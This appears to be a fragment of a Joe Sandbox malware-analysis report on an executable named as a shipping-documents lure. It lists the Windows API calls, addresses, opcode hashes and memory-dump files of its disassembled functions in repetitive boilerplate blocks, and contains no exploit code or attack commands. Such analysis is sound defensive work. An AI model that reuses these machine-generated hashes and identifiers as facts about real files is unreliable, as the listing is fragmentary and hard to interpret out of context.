                                      • Instruction Fuzzy Hash: CF21D072608311ABD711AFA5CC85B2FBBE8EB98760F10093EF541F71C1C7B99901879A
                                      APIs
                                        • Part of subcall function 004068E6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
                                        • Part of subcall function 004068E6: GetProcAddress.KERNEL32(00000000), ref: 00406910
                                      • GetFileVersionInfoSizeW.KERNELBASE(0000000A,00000000,?,000000EE), ref: 004021B5
                                      • GlobalAlloc.KERNEL32(00000040,00000000), ref: 004021D1
                                      • GlobalFree.KERNEL32(?), ref: 00402252
                                        • Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Global$AddressAllocFileFreeHandleInfoModuleProcSizeVersionwsprintf
                                      • String ID:
                                      • API String ID: 1591220723-0
                                      • Opcode ID: 714b08ef66b9b43705571cd4ae7a9ae65d14389d566718652d15def65d7d5d3c
                                      • Instruction ID: 2bc947571e722f1263eb9e5f8c26a617dc66155635cdd3906f3980dfdfcdef41
                                      • Opcode Fuzzy Hash: 714b08ef66b9b43705571cd4ae7a9ae65d14389d566718652d15def65d7d5d3c
                                      • Instruction Fuzzy Hash: 6B213E31608301AFE710AFA1CD4592FBBE5EF84354F01483EFA41E21E1EB76D8159B16
                                      APIs
                                      • RegCloseKey.ADVAPI32(?,?,?,0040C108,?,?,00000011,00000002), ref: 0040271D
                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID:
                                      • API String ID: 3356406503-0
                                      • Opcode ID: 1d42ab8b4145a25c79b294e04f02a9cb00a7c1bb6d884b11203412bb77f2baf5
                                      • Instruction ID: fb228a38f7146265a3f721d89abc8bf78f6fe6bd0b338e84b9d16a0e51430f88
                                      • Opcode Fuzzy Hash: 1d42ab8b4145a25c79b294e04f02a9cb00a7c1bb6d884b11203412bb77f2baf5
                                      • Instruction Fuzzy Hash: 5C11C235658302AFD7149FA4D98863BB3A4EF84315F10093FF102A21D1D7B85909CB5B
                                      APIs
                                      • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                      • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
                                      • Instruction ID: 538a9e804dfe71f8462b772bc95ac31ea7b37d3b99b6caf0eca62282663b68d4
                                      • Opcode Fuzzy Hash: 6e7d67269c197b40b003dd71ad8670726c572316c8dc3490559f09bac35d8640
                                      • Instruction Fuzzy Hash: 4701D472A152309BD7196F28AC09B6B3699AB80711F15453AF901F72F1D2B89C018758
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
                                      • Instruction ID: d43685c7aa133134ae341259a1979053aa5ebee8cfee21dedca447a2e346f0f1
                                      • Opcode Fuzzy Hash: 29eaa5c778d4abe525d16e25b35aaa524ea266b59eab42b9d8fe5f4f647b10db
                                      • Instruction Fuzzy Hash: 77D09E71218202AEEF055F20DE4AF1FBA65EF84710F104A2CF6A6D40F0D6718C24AA11
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,00406591,?,?,00000000,004068AE,?,?,?,?), ref: 00406BA2
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406BB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
                                      • Instruction ID: 2641cd0fcf7a615d2272f2c652f3c677170a534def33f5957a60d90ba1304b54
                                      • Opcode Fuzzy Hash: a418f70179c15550a51c69d56742fce75144ee9ce949d273047196127aa882e5
                                      • Instruction Fuzzy Hash: 11D0A7712040316BC6042738DC0C45ABA56DB853707018735F9F6A22F1D7300C2186D4
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,004031A2,00000004,00000004,00000000,00000000,00000000,00000000), ref: 0040695F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
                                      • Instruction ID: 496ccccc8c492c243bc388fe3eb656b5cfb520ee4410d2fb8332981663b8a2fe
                                      • Opcode Fuzzy Hash: 2db7c5b5d383cb428e65bf87e114ea6cc39ae6a838efe8624f6ef6c49ed421ec
                                      • Instruction Fuzzy Hash: 38E04672200229BBCF209B9ADC08D9FBFADEE957A07024026B805A3110D270EE21C6E4
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,?,0041F538,00403348,?,0041F538,?,0041F538,?,00000004), ref: 00406A22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
                                      • Instruction ID: 40df579de253d7cbce13811cecf730e98513d225cd3d08ff0a4c9fddec416105
                                      • Opcode Fuzzy Hash: df327e9a7695e02a5bae04bfea65e0978199b1218c5bef36048a46936c94f75f
                                      • Instruction Fuzzy Hash: F9E0BF32600129BBCF205B5ADC04E9FFF6DEE926A07114026F905A2150E670EE11DAE4
                                      APIs
                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 004062CE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
                                      • Instruction ID: 8015555a5faba5d47a7295c794b4dc45a0f837954a803b2f281cb622c6ff763f
                                      • Opcode Fuzzy Hash: 9d74b961b3018e30b71e857dcddf3078069952a5892463cd94a54035f436c205
                                      • Instruction Fuzzy Hash: 38E0B6B201020ABEEF096F90DC0ADBB7A5DEB08310F00492EFA0694091E6B5AD30A634
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,00000000,00000800,?,?,004069A5,00000800,?,?,?,Exec,00000000,00000000), ref: 004062FC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
                                      • Instruction ID: 212ff8f8ceecf1c7f7b975949926931c9c9ff354a47ded1b1035142b567bad43
                                      • Opcode Fuzzy Hash: 6046d274b78c3224a6ad722eb80787644d3a57436a5b6bc7b2547111f35c777e
                                      • Instruction Fuzzy Hash: 81D0123204020EBBDF116F909D05FAB3B2DAB08340F004436FE06A4091D775D930A758
                                      APIs
                                        • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070
                                      • SetDlgItemTextW.USER32(?,?,00000000), ref: 00405534
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrcat
                                      • String ID:
                                      • API String ID: 3433768297-0
                                      • Opcode ID: 5920e996c17b1682b3fbae24a7e7d90da5b24a4854a5be530623cad6f891222d
                                      • Instruction ID: 7223d39e7453991a543e52db0d97eef32dd042881d963cd8a47bb39f5a518605
                                      • Opcode Fuzzy Hash: 5920e996c17b1682b3fbae24a7e7d90da5b24a4854a5be530623cad6f891222d
                                      • Instruction Fuzzy Hash: F2C08C71008200BFE641AB04CC02F0FB7A9FFA0316F00C82EB09CE00D1C635C430CA26
                                      APIs
                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
                                      • Instruction ID: f4f70a023dfa60edfff8c312ec9360925e699ce3f775cceab6ab340ddbd6ed3a
                                      • Opcode Fuzzy Hash: e4e95d0fddce0dc824c6f013e603094366fa7490cb3008435431beda4080c4b1
                                      • Instruction Fuzzy Hash: BFC04C716402407ADA109B619D09F477755AB90700F5094257200E51E4D674F410CA1C
                                      APIs
                                      • SendMessageW.USER32(00000028,?,00000001,00405338), ref: 00405511
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
                                      • Instruction ID: 6de71dbe5e5d375af2ff60806ac132807507260846fa189ddd953f73e58556b8
                                      • Opcode Fuzzy Hash: 0b1b9ea5971de38bd84785100290da62d9cd6102021a2a242e6f148554a4776c
                                      • Instruction Fuzzy Hash: 5EB092B5181201BADA919B10DD09F8A7B62ABA4702F028564B200640B0C7B214A0DB18
                                      APIs
